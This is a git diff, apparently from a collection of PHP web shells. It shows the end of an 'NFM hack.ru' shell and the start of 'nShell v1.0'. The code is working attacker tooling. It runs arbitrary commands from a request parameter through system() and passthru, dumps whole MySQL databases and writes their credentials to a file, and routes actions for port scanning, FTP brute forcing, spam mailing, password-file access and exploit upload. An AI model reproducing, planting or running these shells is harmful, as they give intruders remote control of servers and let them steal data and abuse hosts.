+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure ? 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
diff --git a/138shell/N/nshell.php.txt b/138shell/N/nshell.php.txt
new file mode 100644
index 0000000..c5be33a
--- /dev/null
+++ b/138shell/N/nshell.php.txt
@@ -0,0 +1,371 @@
+?»?<head>
+<title> nShell v1.0</title>
+<style>
+html { overflow-x: auto }
+A: {font-weight:bold};
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #444444;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+table {
+BORDER-RIGHT:  :#444444 1px outset;
+BORDER-TOP:    :#444444 1px outset;
+BORDER-LEFT:   :#444444 1px outset;
+BORDER-BOTTOM: :#444444 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    :#444444 1px solid;
+BORDER-LEFT:   :#444444 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+div,td,table {
+font-family:Georgia;
+}
+</style>
+</head>
+<body bgcolor=":#444444">
+<center>
+<?php
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+$myname=$_SERVER['SCRIPT_NAME'];
